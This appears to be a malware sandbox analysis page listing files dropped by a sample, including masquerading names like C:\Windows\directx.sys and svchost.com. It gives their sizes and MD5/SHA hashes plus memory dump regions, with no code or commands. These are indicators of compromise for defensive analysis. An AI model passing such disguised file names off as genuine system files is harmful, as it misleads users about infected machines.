da2b661dc8f386f62259ed1043da7bea209398313878cbd5afd307be4aff70cadcbe8c04366221c41d4e495631b7ee8a912e37867f3580b10e248ebaa4094c9f

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
fbfdea292248bd45b64b152da9dd4054

SHA1
eff9bee0c8443f5ae4edcf024752179477b37594

SHA256
a5f3052c20bdd94afb9c163f1dc808aae68a121051361e19ebc4b41faf7d86d4

SHA512
d550780a034995b7b66259259c67540e545715256a0c7eaa8bdc5402b0eeac93326ef89938bfe2419864cd898ee3f7d37641850a746ab39bdd09abc8546cfe9a

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
35f198dc2e3f6d4039ea9042d5f5c870

SHA1
2612296e5b79316386461e4620cbd88a20bfb595

SHA256
e3d5f7acc72d3755f48b1050cac4b4f6a012e7b470761f9a34b441f6704c6394

SHA512
48f69cfd549944bb32326e0389b20f6b7242635e5bca73846f7604558583d19552785206d1e70211097abebfa22005b2e30d03424124ce725a9bfad4df674f4a

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
c0b10143454d77739a368e04e0f35df5

SHA1
f3af68a474210444d81d85902d20e1b358dee3cf

SHA256
2917e6960136a725e02b583e48084f2d01e6f067b0e0c48a903cb9e87cbcc084

SHA512
d7a195e2a204bb8735770e8b69ecaadd209b59f0f80548f19294301cc11b7f4e8b818d0fe4075faed3cc6012654afb0447057867bb4d2e96311bc9474ed6c01b

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
cea6a4c1ee116783872ed5c0bda941f7

SHA1
fe49e4ab5852a6f167b8702cc51c829eae231a5f

SHA256
d2c1a20b5bac06401c28f67886d93bf4c8b7ded16d82b3eb82e35f007579bbf1

SHA512
0d978db90a1e7d7ec2b394d69e480d4714a6e4540c40df7d7ea1a66a8f81c6df5c0e25d575a8dbb5aa76b40ae1074464171d8bbc94f7f5b438493cdc4c994549

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
9f01f7ef3ea836ab934475a967184983

SHA1
b72b7dcdeaccd54efe0d8aef1a29eda8361ddd87

SHA256
8e8263386cf0ea715887db8cb8e75685782d518151a570d9b27466b63f4b2343

SHA512
d14526774219d7890b346b38f551dc338ab5b5d1b5277612c8c49cd50868983ba037239973752d1f734ee20d1d4d40fc535441ea0d7052e01617f31ddf9084c1

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
437a824e567758f2c3d8a8d47cb24934

SHA1
99dbc079ec0a8b765e1ad6f9fed1e956f3faedc0

SHA256
393f2d5f3864d9b464cad3e36f8c33659d3804a26504b1dc08d33616657c3a79

SHA512
da54838287f31717ba8e1557d829aa21a8677c372a519c6b47945a22b22ada11c9634988f79ecb67273226ea1a96c10bd6e8bd9843b79dc081913c1f111feb01

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
9daa1e6eaf5fa9979ea94389be47e8e2

SHA1
b52d0c4a4c7e6f1b8655b7c39584c0fc7766cc8f

SHA256
5618ef9062e7968d4b1eb765829416bc91e3f2490d41d4f46d9ecbb305335a7e

SHA512
4da1da6be4f1e874509ce7cfe762f18c25d792f025e8d806f4e3378b88821c8cdca740ce3c608131b623167a16ba0b3d502fd2792d57c827891f10533659d810

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
382aa8bc77ca33e037dd9c4a5b340be1

SHA1
4b1a9f8ed3fc221f62d90b755080acca5af96a58

SHA256
3d19e028fdd48b633846bfb47da2e7b2139764622b882cdfee04e40a05257f2b

SHA512
88c2a159634741f0bba2dcadd7a74b4ef1e1cda445c88852c3cdc86efed8daa56628b2e21b78932c2d2720f0a0882c6c5d04b72586ba8340b4f6dfd3be040d9d

Download Submit
C:\Windows\svchost.com

Filesize
40KB

MD5
36fd5e09c417c767a952b4609d73a54b

SHA1
299399c5a2403080a5bf67fb46faec210025b36d

SHA256
980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

SHA512
1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

Download Submit
C:\Windows\winknavrso.exe

Filesize
23KB

MD5
9d2b22562b9a3958dfd7e6e6fa7bd66f

SHA1
1941c24958ac09cf518f4124225b2d0b5d874cf0

SHA256
84daa9d52f759af343741880a3b66a3abb886310de7f552743d99e69741c6450

SHA512
8c0b54e01f62207edaaf8f967fe83eacd3e278660c1764feb3fde68bfd376ba875012849f969d8b5922bd6b791a231bf75dc76eade227e2fd25f4791163d9dd1

Download Submit
\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

Filesize
252KB

MD5
9e2b9928c89a9d0da1d3e8f4bd96afa7

SHA1
ec66cda99f44b62470c6930e5afda061579cde35

SHA256
8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

SHA512
2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

Download Submit
\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE

Filesize
49KB

MD5
1aa8f5f435652409aaedbb51537cb74b

SHA1
d3816f1db8007668c27f7b291cdaf7c6feb067ab

SHA256
4cd628f354e30bd91aa338ad5c0bf03ba2e28ad8ee035c1d6a336f92a7a7e189

SHA512
01173598f60980b0873a65c71ca311a5d1e88787bc22c2e0698d65f32f91af408ad512e1e8b852f988245487ee9c6050f7bf297c3fc621ab7bee5fae39354b1c

Download Submit
\Users\Admin\AppData\Local\Temp\3582-490\Gamma_Byte_20240225090825600.exe

Filesize
644KB

MD5
b9c0b39b9377300a9acd3b8da518fa2f

SHA1
8bd62bb3ad9dfd9682777240e96a1d9c9910e847

SHA256
571fd91b18a133694c90a727a1bc77eb6f804d7b538f39efb374b962c6f04b94

SHA512
19d8041cf48293eee2aad7dba6c9404024214fb3f78b9fca7f28eaa6e163cebec6cb8d4654e9d6aa8f3deb179ce4275d9caefc5cbd4552466031737155add344

Download Submit
\Users\Admin\AppData\Local\Temp\3582-490\Gamma_Byte_20240225090825600.exe

Filesize
607KB

MD5
2598e6773ad7bd187bf0a9a6edf19b86

SHA1
e7d1697df9facbe036b2e80d632b6078e2ae0c54

SHA256
76858bcc5452964c6f7496ac8e9083c3935631c5bd77b6464d7aaa191fa0d902

SHA512
914e2a06722e9a5788ddaccac7b5400ecc9a4dcb07724d0881564682548fed9b83aebd8d1f3a392cb1027276a424f93ad0259bc0b9fd0ca0d1e6b4171d07f380

Download Submit
\Users\Admin\AppData\Local\Temp\Files\%E5%88~1.EXE

Filesize
199KB

MD5
c7096dbc5e4dec400ee113b2f17805b6

SHA1
b17d7221b15555d251f4edb185ca7be0a42e7111

SHA256
eef1e0980be4449eaeeb28fd079dd9ea0a4480abf70075019da089b31f265a1e

SHA512
30ee3f215a13e48a466baffb16c515d6da2a78dd598e4415bd723f910e2a330fb588d44250d7a3ae4152d1bf7acfa23ecf0fd2886543bf4fe7549ea7426b3560

Download Submit
\Users\Admin\AppData\Local\Temp\Files\Gamma_Byte_20240225090825600.exe

Filesize
1.2MB

MD5
f95261535f4bda61b74b6ffb5d6fffd5

SHA1
e1639bf99e2b18b2fd54ab9f2a4a024982ee161e

SHA256
6a32e5c9ac2025bd47a9ba3397f3047114b7d12d5a3ef6dd38ee54db0f134cb6

SHA512
6f286f52c971449f822771826946d9705110533799f36822051a1ead2a3aea61b43e002a9e1463cd1ca19faffdbd6ff7129bd89fc282318d0bd844068f49136f

Download Submit
\Users\Admin\AppData\Local\Temp\Files\Gamma_Byte_20240225090825600.exe

Filesize
1.8MB

MD5
128f78f678e72e4deb3a84a207b4cd31

SHA1
a20756a3a599af0f339efbf83541f971e8b860f2

SHA256
1b897ba8eb33c601654463082050f33e4dda1c1975189bf4a923d7c8ed7ec3af

SHA512
7f610e061ceb7854aecfad583d4a737949b04d48a3b46c4364905b981995dc6aa91433abb7133764f0737e7bad7f6fa45164da54915bcb5a55c31dc3d5623fbd

Download Submit
\Users\Admin\AppData\Local\Temp\Files\fu.exe

Filesize
897KB

MD5
ac22398267dcb36ef75955c92cec2e02

SHA1
a8c2c3d9423609c49aaee150451e32605e0e88aa

SHA256
7dbfdc26680dd6db6c57c79754ad2a70d34074195aa787f0236223fe69b2ac0d

SHA512
aafa67dbd57524cd3e4ec0a1164895eccbb89ed10a824e7b1bda6faeed486d14aa750f37342aa4361b38c335ad1ceaf2d6fe6e07ffc8734273d65836d21dcbdb

Download Submit
\Users\Admin\AppData\Local\Temp\is-9L8PQ.tmp\%E5%88~1.tmp

Filesize
6KB

MD5
2bd4ce3cccf11a5a78fa68fc6817fff7

SHA1
57b91e4dd86b8afb1c5d14e9b6ec032973a5d02f

SHA256
aa2ac3cb38d103dca0eb6fe53da81d9a03f97848f6920e919a975841ec841830

SHA512
d5ccf6d416348e4461bd8a8b40fbd8f8fe092698351bc32f50815e2bca9b99723a64b4c6f437097a3c4e1e608bdd88ec8138fe474016390f5d1ade546416ce20

Download Submit
memory/836-1365-0x0000000000400000-0x000000000071B000-memory.dmp

Filesize
3.1MB

Download
memory/836-1983-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/836-1017-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/864-1363-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/864-997-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1020-2002-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1288-3073-0x000007FECC200000-0x000007FECC20A000-memory.dmp

Filesize
40KB

Download
memory/1288-3115-0x000007FEF5240000-0x000007FEF5383000-memory.dmp

Filesize
1.3MB

Download
memory/1388-1349-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1592-1809-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1592-1295-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1592-1703-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1592-1990-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1700-1577-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1780-1711-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1948-1343-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2032-1717-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2032-1706-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2208-1348-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2284-3419-0x0000000007C60000-0x0000000007C61000-memory.dmp

Filesize
4KB

Download
memory/2284-1592-0x0000000007C60000-0x0000000007C61000-memory.dmp

Filesize
4KB

Download
memory/2284-3384-0x0000000077830000-0x00000000779D9000-memory.dmp

Filesize
1.7MB

Download
memory/2284-1298-0x0000000077830000-0x00000000779D9000-memory.dmp

Filesize
1.7MB

Download
memory/2528-1016-0x0000000002940000-0x0000000002941000-memory.dmp

Filesize
4KB

Download
memory/2528-80-0x0000000002940000-0x0000000002941000-memory.dmp

Filesize
4KB

Download
memory/2684-2007-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2684-1821-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2684-1361-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2684-1719-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2772-919-0x0000000004970000-0x00000000049B0000-memory.dmp

Filesize
256KB

Download
memory/2772-918-0x0000000074A30000-0x000000007511E000-memory.dmp

Filesize
6.9MB

Download
memory/2772-2-0x0000000004970000-0x00000000049B0000-memory.dmp

Filesize
256KB

Download
memory/2772-0-0x0000000000FF0000-0x0000000000FF8000-memory.dmp

Filesize
32KB

Download
memory/2772-1-0x0000000074A30000-0x000000007511E000-memory.dmp

Filesize
6.9MB

Download
memory/2816-1032-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2920-1346-0x000007FEE7E20000-0x000007FEE8E20000-memory.dmp

Filesize
16.0MB

Download
memory/3076-1552-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download
memory/3212-1685-0x00000000779E0000-0x00000000779E1000-memory.dmp

Filesize
4KB

Download
memory/3228-3987-0x0000000000250000-0x00000000003E0000-memory.dmp

Filesize
1.6MB

Download
memory/3228-4023-0x0000000000640000-0x0000000000652000-memory.dmp

Filesize
72KB

Download
memory/3228-4016-0x000000001AEA0000-0x000000001AF20000-memory.dmp

Filesize
512KB

Download
memory/3228-3998-0x000007FEEF740000-0x000007FEF012C000-memory.dmp

Filesize
9.9MB

Download
memory/3228-4391-0x000007FEEF740000-0x000007FEF012C000-memory.dmp

Filesize
9.9MB

Download
memory/3492-1939-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3492-2041-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3668-2635-0x000007FEF5240000-0x000007FEF5383000-memory.dmp

Filesize
1.3MB

Download
memory/3668-2491-0x000007FE92510000-0x000007FE9251A000-memory.dmp

Filesize
40KB

Download
memory/3832-1973-0x0000000004C00000-0x0000000004E03000-memory.dmp

Filesize
2.0MB

Download
memory/3832-1988-0x0000000004C00000-0x0000000004E03000-memory.dmp

Filesize
2.0MB

Download
memory/3832-2009-0x0000000004C00000-0x0000000004E03000-memory.dmp

Filesize
2.0MB

Download
memory/3832-2019-0x0000000004C00000-0x0000000004E03000-memory.dmp

Filesize
2.0MB

Download
memory/3832-2037-0x0000000004C00000-0x0000000004E03000-memory.dmp

Filesize
2.0MB

Download
memory/3832-3640-0x0000000074A30000-0x000000007511E000-memory.dmp

Filesize
6.9MB

Download
memory/3832-2121-0x0000000074A30000-0x000000007511E000-memory.dmp

Filesize
6.9MB

Download
memory/3832-1950-0x0000000004C00000-0x0000000004E08000-memory.dmp

Filesize
2.0MB

Download
memory/3832-1934-0x0000000000B10000-0x0000000000D38000-memory.dmp

Filesize
2.2MB

Download
memory/4188-3325-0x000007FEF3610000-0x000007FEF3FFC000-memory.dmp

Filesize
9.9MB

Download
memory/4188-3400-0x000000001AD50000-0x000000001ADD0000-memory.dmp

Filesize
512KB

Download
memory/4188-3908-0x000007FEF3610000-0x000007FEF3FFC000-memory.dmp

Filesize
9.9MB

Download
memory/4188-3817-0x000000001AD50000-0x000000001ADD0000-memory.dmp

Filesize
512KB

Download
memory/4188-3729-0x000007FEF3610000-0x000007FEF3FFC000-memory.dmp

Filesize
9.9MB

Download
memory/4188-3479-0x0000000000C30000-0x0000000000C3E000-memory.dmp

Filesize
56KB

Download
memory/4188-3489-0x00000000021D0000-0x00000000021DE000-memory.dmp

Filesize
56KB

Download
memory/4188-2926-0x0000000000C40000-0x0000000000DD0000-memory.dmp

Filesize
1.6MB

Download
memory/4188-3447-0x0000000000A90000-0x0000000000AAC000-memory.dmp

Filesize
112KB

Download
memory/4188-3478-0x0000000000BF0000-0x0000000000C02000-memory.dmp

Filesize
72KB

Download
memory/4188-3477-0x0000000000C00000-0x0000000000C0C000-memory.dmp

Filesize
48KB

Download
memory/4188-3448-0x0000000000B40000-0x0000000000B56000-memory.dmp

Filesize
88KB

Download
memory/4188-3449-0x0000000000AB0000-0x0000000000ABC000-memory.dmp

Filesize
48KB

Download
memory/4188-3475-0x0000000000BE0000-0x0000000000BF0000-memory.dmp

Filesize
64KB

Download
memory/4432-4538-0x00000000004A0000-0x00000000004B0000-memory.dmp

Filesize
64KB

Download
memory/4432-4551-0x0000000000500000-0x000000000050A000-memory.dmp

Filesize
40KB

Download
memory/4432-4708-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/4432-4678-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/4432-4618-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/4432-4550-0x00000000004F0000-0x00000000004FC000-memory.dmp

Filesize
48KB

Download
memory/4432-4712-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/4432-4549-0x00000000004E0000-0x00000000004EC000-memory.dmp

Filesize
48KB

Download
memory/4432-4566-0x0000000000540000-0x000000000054C000-memory.dmp

Filesize
48KB

Download
memory/4432-4539-0x00000000004C0000-0x00000000004C8000-memory.dmp

Filesize
32KB

Download
memory/4432-4709-0x000000001B440000-0x000000001B4C0000-memory.dmp

Filesize
512KB

Download
memory/4432-4552-0x0000000000510000-0x0000000000518000-memory.dmp

Filesize
32KB

Download
memory/4432-4553-0x0000000000530000-0x000000000053C000-memory.dmp

Filesize
48KB

Download
memory/4432-4507-0x0000000000D40000-0x0000000000F06000-memory.dmp

Filesize
1.8MB

Download
memory/4432-4530-0x0000000000490000-0x00000000004A2000-memory.dmp

Filesize
72KB

Download
memory/4432-4563-0x000007FEF3610000-0x000007FEF3FFC000-memory.dmp

Filesize
9.9MB

Download
memory/4432-4529-0x0000000000470000-0x0000000000486000-memory.dmp

Filesize
88KB

Download
memory/4432-4528-0x0000000000460000-0x0000000000470000-memory.dmp

Filesize
64KB

Download
memory/4432-4527-0x0000000000450000-0x0000000000458000-memory.dmp

Filesize
32KB

Download
memory/4432-4526-0x0000000000430000-0x000000000044C000-memory.dmp

Filesize
112KB

Download
memory/4588-2154-0x0000000001DC0000-0x00000000021AE000-memory.dmp

Filesize
3.9MB

Download
memory/4904-3338-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/5000-2162-0x0000000000830000-0x0000000000C1E000-memory.dmp

Filesize
3.9MB

Download
memory/5000-2259-0x0000000000830000-0x0000000000C1E000-memory.dmp

Filesize
3.9MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads